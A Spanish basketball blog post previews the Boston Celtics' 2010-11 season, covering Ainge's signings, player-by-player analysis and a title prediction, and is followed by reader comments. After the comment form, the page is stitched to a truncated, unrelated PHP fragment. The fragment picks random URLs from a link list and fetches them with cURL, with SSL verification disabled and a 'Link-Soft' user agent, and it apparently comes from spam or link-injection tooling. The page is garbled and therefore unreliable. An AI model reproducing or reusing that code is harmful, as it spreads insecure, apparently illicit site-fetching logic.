Boston Celtics 2010-2011: Mientras el cuerpo aguante

29 de September de 2010 por Jabho

Comenzaba el verano en Boston con la incertudumbre de hacia donde iría el equipo. Sugar Ray acababa contrato, Sheed rumoreaba su retirada, Pierce salía voluntariamente al mercado de agentes libres y Doc Rivers meditaba tomarse un año sabático. Ahí es nada. Danny Ainge tenía en sus manos una plantilla con un único contrato largo, Rondo, y la posibilidad de empezar de nuevo desde ya mismo. Tentador…

Pero supongo que Ainge repasó mentalmente las 3 temporadas que este grupo de jugadores ha jugado juntos y aclaró las dudas que pudiera haber tenido. Porque perder la final en el último minuto del último partido es como para confiar tu suerte al mismo equipo que tan cara vendió su derrota. Y porque una reconstrucción, por bien que te salga, no te garantiza estar más cerca del título de lo que estás en este momento en el que sólo 1 equipo, 2 si me apuras, tienen de partida más opciones que tú al anillo.

A partir de aquí los Celtics han seguido un camino que el tiempo demostrará o no acertado, pero vaya por delante que yo lo aplaudo. Gran trabajo el de Ainge que ya adelantó la renovación de Rondo al verano de locura de agentes libres ahorrándose seguramente un pico y que ha consolidado un equipo en la línea de los anteriores pero que parece a priori más profundo, más equililbrado y más peligroso cuando llegue el momento de jugarse los cuartos… Que llegará.

El primer paso fue convencer a Doc Rivers para continuar un año más. El segundo renovar al capitán con un contrato que casi le garantiza retirarse vistiendo de verde y que da un respiro salarial a corto plazo, sin comprometer demasiado la flexibilidad salarial a medio plazo. A partir de ahí renovación de Ray Allen, firma de Jermaine O´Neal, renovación de Robinson,  fichajes de Wafer y Delonte… La guinda del pastel fue, sin duda, la incorporaración de Shaq.

Boston ha configurado una gran plantilla que si todo va bien luchará por ganar otros 2 años, pero que en el peor de los casos sólo Rondo y Pierce tienen contrato para cuando pasen estas 2 temporadas, y será por tanto el momento de pensar en otro proyecto. Brillante gestión de un Ainge que aún mantiene el contrato de Sheed como un activo que podría utilizar para reforzar al equipo antes de acabar la temporada. Le ha faltado conseguir a Rudy (directito me hubiera ido a por su camiseta).

El cuerpo técnico seguirá comandado un año más por Doc Rivers. Hoy ya nadie duda de que es uno de los mejores entrenadores de la liga. Sin el aura de Phil Jackson, ni la fama de duro de los Popovich, Brown o Sloan, se ha enfrentado con éxito al reto de dirigir egos y personalidades complejas. Hasta ahora ha podido ser difícil, pero lo de este año va para nota. Por como sepa gestionar las cabezas de los que estaban, de los que han renovado (Robinson) y de los que llegan (Shaq y sobretodo West) pasan muchas de las opciones verdes. Es un gran motivador y lee bien los partidos, pero si en algo destaca por encima del resto es en la preparación que hace de los partidos importantes… Sin duda echarán de menos a Tom Thibodeau que convirtió a los Celtics en uno de los equipos que mejor defendían en la liga. Lawrence Frank, ex-primer entrenador de los Nets, llega para sustituirle como asistente especialista en defensa.

En la cancha el playmaker titular será Rajon Rondo. Rondo no ha dejado de crecer en sus años en la liga y es ya tan importante para los Celtics como cualquier integrante del Big Three. Sobre sus hombros debe descansar el liderazgo del equipo en muchas fases de la regular. Alto, atlético y rápido de piernas y manos, buen defensor capaz de liderar la liga en balones robados y bueno ofensivamente con gran visión de juego y gran capacidad para penetrar, buen reboteador desde la posición de base… Un jugador muy completo que tiene como claro punto de mejora el tiro. Debe ser capaz de anotar con solvencia al menos en posiciones cómodas, para evitar que el defensor de turno le flote y ayude en la defensa de los interiores (para más datos ver la defensa de Kobe en la final). Con todo es uno de los mejores bases de la liga, uno de mis favoritos, y uno de los jugadores más competitivos, de los que te puedes fiar en los momentos calientes.

La rotación en el puesto de base empieza en teoría por el microondas Nate Robinson, un escolta en cuerpo de base, pero tanto Delonte West como Marquis Daniels podrían jugar en este puesto. Robinson es un jugador que bien dirigido puede ejercer como anotador desde el banco y como revulsivo en partidos que lo requieran. Delonte y Marquis vienen de hacer temporadas bastante flojas. Delonte, si su cabeza le deja, es un jugador que aporta dirección y buen tiro. Marquis es un jugador versátil y que podría ocupar el rol defensivo que ejerció Tony Allen el año pasado. Habrá que esperar para ver el rendimiento de ambos.

En las alas continuaran The Truth y Sugar Ray. Pierce, uno de los mejores de la década, sigue siendo un point-forward que destaca por su inteligencia muy por encima de sus condiciones físicas. Capitán, líder espiritual del equipo y jugador al que mirar cuando llegan las bolas calientes. Ray ejerce cada vez más como especialista en el tiro, faceta dónde sigue siendo de los mejores de la liga, que como All Star. Sin embargo será difícil ver partidos importantes en los que los Celtics jueguen algún minuto sin él ni Pierce en la cancha, lo que habla de la importancia de Ray.

La rotación en la alas es quizás el punto más flojo de la plantilla. A los mencionados West y Daniels, se une un Von Wafer del que se puede esperar anotación. Cualquiera de los 3 puede hacer una gran temporada, pero ninguno de los 3 es precisamente fiable en cuanto a rendimiento. Si a esto le unimos que los minutos del duo titular deberían ir a menos, está por ver si el equipo tiene o no un problema. Está también el rookie Avery Bradley, buen físico, defensa y anotación aunque muy verde, que podría tener más minutos de los esperados en función de como jueguen los anteriores y de su propia adaptación a la liga. El estilo físico y rápido de la NBA, en comparación con la NCAA, le viene como anillo al dedo y debe aportar una energía e intensidad que pocos jugadores tienen en la banca verde. Ainge generalmente pesca bien en la zona media del draft.

En el frontcourt, con Kendrick Perkins lesionado hasta febrero, apuesto por el duo Garnett y Shaq como titulares. Garnett ha perdido explosividad tras la lesión (aunque parece que está mejor que el año pasado) pero sigue liderando al equipo en defensa y actitud. En ataque ha reducido sus acciones de espaldas al aro pero tiene recursos, como su buen tiro o su buena visión de juego, con los que seguir aportando. Shaq sigue siendo un jugador mastodóntico y desequilibrante los 20 minutos que está en la pista. Difícil de defender y difícil de atacar. El carismático, y divertido, futuro Hall of Fame llega a los Celtics motivado para añadir un anillo más a su carrera (y quizás para que Kobe añada uno menos, jejeje). Su carrera merece empezar como titular.

Del banco, aunque jugando quizás más minutos que los titulares en temporada regular, saldrán Glen Davis y “el otro” O´Neal. Big Davis empezó tarde y mal la temporada pasada merced a una extraña pelea en la que se rompió la mano pero parece pertenecer a esa estirpe de jugadores que dan lo mejor de sí en Play Offs y acabó la temporada dejando nuevamente buenas sensaciones. Esta temporada debería consolidarse y ser un jugador mucho más regular. Jermaine ha dejado atrás sus contratos de estrella y, tras dos temporadas jugando cerca de 70 partidos, parece que también sus lesiones. Es otro jugador reclutado para la gloria en busca del anillo y a bajo coste, por lo que si se mantiene sano será una gran incorporación. Kedrick Perkins debería volver para el tramo más importante de la temporada y aportar músculo, trabajo y defensa. El rookie Luke Harangody podría heredar el rol de Scalabrine.

Los Celtics tienen un plantilla evidentemente envejecida. Sus titulares, salvo Rondo, no deberían jugar más de 25 o 30 minutos en los partidos de la temporada regular. Hay jugadores con un ego por encima de su juego, antiguas estrellas venidas a menos que deben aceptar su nuevo papel, personalidades complicadas… Pero por otra parte es una plantilla profunda, compensada, con mucha confianza en sí misma y especialmente con muchos kilos y muchos centrímetos en la zona en la que se ganan los partidos. Deberían hacer una regular de menos a más, repartiendo mucho los minutos de juego y con el objetivo fundamental de llegar sanos y en buena forma a Abril. Y si encima es en uno de los 4 primeros puestos del Este, que no parece difícil, mejor.

A partir de ahí empezará lo fácil. Porque en Play Offs se juega una competición de 25 partidos, intensa sin duda, pero donde la edad importa menos, las rodillas también duelen menos y la motivación puede más. A partir de ahí todos, aficionados y rivales, saben que se van a encontrar con un equipo que defenderá duro cada posesión, que venderá cara cada canasta y que atacará con paciencia cada ataque. Un equipo al que para ganarle estos años ha habido que jugar una eliminatoria a 7 partidos a cara de perro.

Como una alternativa al three-peat y los vientos dinásticos que vienen de tierras calurosas, aparece este grupo de jugadores viejos, más sabe el diablo por viejo que por diablo, confiados y peligrosos. Hoy no son favoritos, pero en Abril nadie les querrá enfrente. Eso seguro. Por algo será.

Quinteto inicial: Rajon Rondo, Ray Allen, Paul Pierce, Kevin Garnett y Shaquille O´neal
6º Hombre: Jermaine O´neal

Altas: Shaquille O´neal, Jermaine O´neal, Delonte West, Von Wafer, Avery Bradley (rookie), Luke Harangody (rookie) y Semih Erden (rookie)
Bajas:
Tony Allen, Brian Scalabrine, Rasheed Wallace, Shelden Williams, Michael Finley, JR Giddens y Bill Walker

Pronóstico: Llevo 3 años apostando por ellos como campeones y no me han defraudado. Que sean 4.

Comenta

11 comentarios a esta entrada

  1. portu dice:
    #1

    Tremendo análisis, clavado.
    Aparte de las preocupaciones lógicas, en este caso más q nunca las lesiones y el envejecimiento de las figuras del equipo, hay un factor defnsivo en el juego exterior no resuelto, ese papel q empezó ocupando Posey y heredó el año pasado T. Allen parece q ha quedado huérfano esta temporada. Marquis Daniels lo hizo tan mal el poco tiempo q jugó (pese a q se hablaba de lesiones tb…) q no me aporta ninguna confianza para este año, V. Wafer y Nate pueden surgir como revulsivos ofensivos, pero no son buenos defensores y a los rookies no suele darles mucha bola Doc Rivers su 1er año… no sé veo una lagunilla importante ahí.

      Citar

  2. Viva_Dirk dice:
    #2

    Muy deacuerdo con el análisis aunque no con el pronóstico, jeje. Desde luego me encantaría una una final Lakers-Celtics, espero que Boston le de su merecido a los Heat y sobre todo que no haya lesiones de importancia que nos permita ver uno de los mayores espectaculos del mundo.

    El rol del que habla portu si esta desierto ahora mismo, de Daniels no creo que esperen nada y el único con capacidades para hacerlo es Bradley, si su rendimiento es bueno no dudo de que Rivers lo utilizará, no es de los mas cuadriculados en ese sentido.

      Citar

  3. sergio dice:
    #3

    Portu… el unico exterior que no has comentado si tiene dotes defensivas: Delonte West

    Por cierto, me alegra muxo la adquisición de Tim Allen por los Grizzlies. Defensa en el perímetro es lo que le hacía más falta a este equipo.

    P.D: Viva_Dirk…. ese “halla lesiones” con dos L’s me ha dolido jajajajajjaaj

      Citar

  4. Viva_Dirk dice:
    #4

    Cual?? 😉

      Citar

  5. rojorob dice:
    #5

    Creo que Sergio se refiere a Tony Allen. Si no me equivoco, es la segunda vez que se te pira y te acuerdas de Tim “Herramientas” Taylor. ¡¡¡Que empiece ya!!!

      Citar

  6. The Virus. CelticsBlog.com dice:
    #6

    Muy buen artículo, buenísimo.

    Concuerdo en todo lo dicho.
    Yo también opino que aún falta un retoque, el alero suplente, pero lo cierto es que con Avery Bradley, Von Wafer y Delonte West parece no estar tan mal cubierta. Bradley destaca por su gran defensa y su físico, Delonte por ser un microondas y Wafer por tener muy buena mano desde el triple, además de un gran físico.

    No creo que sea tan importante un alero defensor teniendo semejante relevo. Pierce- Wafer/West/Bradley/Daniels e incluso Harangody, quien puede llegar a desarrollarse como alero.

    Luke posee un gran ventaja, sabe cuáles son sus puntos débiles y los reconoce, tratando de hacer los mejor posible todo lo que sabe llevar a cabo. Tiene buena mano desde la lejanía, sabe rebotear, es fuerte y podemos calificarle como rápido para ser un cuatro. Si mejorase su desplazamiento lateral, dependerá de si Rivers le quiera o no usar de alero, podríamos lograr tener a ese perro de presa que también la puede clavar desde cualquier punto, ganar la partida en el rebote y ayudar al equipo siempre.

      Citar

  7. sergio dice:
    #7

    Dirk, ya podrias haber cambiado tambien mi error de Tim Allen por Tony Allen ¬¬ jajaja. No se porq se me ha venido Tim Allen. Ese era el de “Un chapuzas en casa” , no?

    Lo peor es q como dice rojorob no es la primera vez que se me va….

      Citar

  8. Love Denise dice:
    #8

    Me juego 100 euros del Monopoly a que Ra-Shit Wallace vuelve en Febrero a jugar con los Celtics.

      Citar

  9. Toni dice:
    #9

    Desde luego que no hay nada como leeros.
    Yo me subo al carro de Love en cuanto a lo de Sheed.

    Y con Rudy ¿que hacemos?

      Citar

  10. sayim dice:
    #10

    Yo no creo q sheed vuelva y debo ser el unico que no acaba d ver a Rudy encajando en el estilo de estos Celtics

      Citar

  11. Jabho dice:
    #11

    Yo tb creo que los Celtics harán algún movimiento durante la temporada. Deberían incorporar un alero, si es posible un alero alto y atlético,…. A ver que pasa en febrero porque si Sheed de verdad se retira junto con el contrato de Perkins que ya intentaron mover este verano podrían tener muchos millones para ir apor algun buen jugador no muy a gusto en su equipo….

    Por cierto, Hollinger no apuesta por ellos 🙁

    http://espndeportes.espn.go.com/news/story?id=1142799&s=bas&type=column

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>